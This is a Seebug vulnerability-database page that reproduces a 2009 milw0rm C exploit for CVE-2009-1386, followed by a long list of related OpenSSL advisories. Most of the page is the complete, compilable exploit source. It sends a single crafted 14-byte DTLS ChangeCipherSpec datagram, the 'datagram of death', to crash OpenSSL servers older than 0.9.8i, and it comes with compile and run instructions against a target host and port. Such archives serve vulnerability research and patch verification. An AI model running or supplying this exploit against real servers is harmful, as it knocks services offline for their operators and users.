Lucene search
RootSSV:66601HistoryJul 01, 2014 - 12:00 a.m.
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2014-07-0100:00:00
Root
www.seebug.org
20
0.051 Low
EPSS
Percentile
92.1%
No description provided by source.
/*
* cve-2009-1386.c
*
* OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
*
* OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as
* the first record instead of ClientHello.
*
* Usage:
*
* Pass the host and port of the target DTLS server:
*
* $ gcc cve-2009-1386.c -o cve-2009-1386
* $ ./cve-2009-1386 1.2.3.4 666
*
* Notes:
*
* Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this
* only requires a single ChangeCipherSpec datagram, but affects an older
* version of OpenSSL.
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
int
main(int argc, char **argv)
{
int sock, ret;
char *ptr, *err;
struct hostent *h;
struct sockaddr_in target;
char buf[64];
if (argc < 3) {
err = "Pass the host and port of the target DTLS server";
printf("[-] Error: %s\n", err);
exit(1);
}
h = gethostbyname(argv[1]);
if (!h) {
err = "Unknown host specified";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
target.sin_family = h->h_addrtype;
memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
target.sin_port = htons(atoi(argv[2]));
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock == -1) {
err = "Failed creating UDP socket";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
if (ret == -1) {
err = "Failed to connect socket";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14);
printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]);
send(sock, buf, 14, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-06-04]
Related
seebug
seebug
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2009-06-05 00:00:00
OpenSSL <= 0.9.8k 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS
2009-05-18 00:00:00
OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS
2014-07-01 00:00:00
exploitpack
exploitpack
OpenSSL 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service
2009-06-04 00:00:00
OpenSSL 0.9.8k1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
2009-05-18 00:00:00
exploitdb
exploitdb
OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service
2009-06-04 00:00:00
OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
2009-05-18 00:00:00
nessus
nessus
OpenSSL < 0.9.8i Denial of Service
2012-01-04 00:00:00
Mandriva Linux Security Advisory : openssl (MDVSA-2009:310)
2009-12-04 00:00:00
ubuntu
ubuntu
OpenSSL vulnerabilities
2009-06-25 00:00:00
securityvulns
securityvulns
[USN-792-1] OpenSSL vulnerabilities
2009-06-25 00:00:00
Multiple OpenSSL DoS conditions
2009-06-25 00:00:00
[ MDVSA-2009:120 ] openssl
2009-05-21 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-792-1)
2009-06-29 00:00:00
Denial Of Service Vulnerability in OpenSSL (Jun 2009) - Linux
2009-06-12 00:00:00
CentOS Security Advisory CESA-2009:1335 (openssl)
2009-09-21 00:00:00
osv
osv
openssl - cryptographic weakness
2009-09-15 00:00:00
f5
f5
SOL15351 - OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386
2014-06-19 00:00:00
SOL15359 - OpenSSL vulnerability CVE-2009-1378
2014-06-19 00:00:00
K15351 : OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386
2014-06-19 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:42:00
Denial Of Service (DoS)
2020-04-10 00:42:00
debiancve
debiancve
CVE-2009-1378
2009-05-19 19:30:00
CVE-2009-1386
2009-06-04 16:30:00
cve
cve
CVE-2009-1386
2009-06-04 16:30:00
CVE-2009-1378
2009-05-19 19:30:00
ubuntucve
ubuntucve
CVE-2009-1386
2009-06-04 00:00:00
CVE-2009-1378
2009-05-19 00:00:00
openssl
openssl
Vulnerability in OpenSSL CVE-2009-1386
2009-06-02 00:00:00
Vulnerability in OpenSSL CVE-2009-1378
2009-05-12 00:00:00
prion
prion
Null pointer dereference
2009-06-04 16:30:00
Memory corruption
2009-05-19 19:30:00
debian
debian
[SECURITY] [DSA 1888-1] New openssl packages deprecate MD2 hash signatures
2009-09-15 21:37:22
oraclelinux
oraclelinux
openssl security, bug fix, and enhancement update
2009-09-08 00:00:00
openssl-fips security update
2015-04-02 00:00:00
openssl security update
2019-03-13 00:00:00
redhat
redhat
(RHSA-2009:1335) Moderate: openssl security, bug fix, and enhancement update
2009-09-02 09:47:12
centos
centos
openssl security update
2009-09-15 18:42:01
freebsd
freebsd
openssl -- denial of service in DTLS implementation
2009-05-18 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 9 package openssl1.1 version 0.9.8k-alt2
2009-05-21 00:00:00
Security fix for the ALT Linux 8 package openssl10 version 0.9.8k-alt2
2009-05-21 00:00:00
Security fix for the ALT Linux 6 package openssl10 version 0.9.8k-alt2
2009-05-21 00:00:00
fedora
fedora
[SECURITY] Fedora 11 Update: openssl-0.9.8k-5.fc11
2009-06-19 13:42:48
[SECURITY] Fedora 10 Update: openssl-0.9.8g-14.fc10
2009-06-19 13:35:27
[SECURITY] Fedora 9 Update: openssl-0.9.8g-9.14.fc9
2009-06-19 13:40:57
gentoo
gentoo
OpenSSL: Multiple vulnerabilities
2009-12-01 00:00:00
vmware
vmware
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESXi utilities and ESX Service Console third party updates
2010-05-27 00:00:00
lenovo
lenovo
Intel® PROSet/Wireless WiFi Software Vulnerabilities - US
2018-11-13 17:10:51
Intel® PROSet/Wireless WiFi Software Vulnerabilities - Lenovo Support US
2018-11-13 17:10:51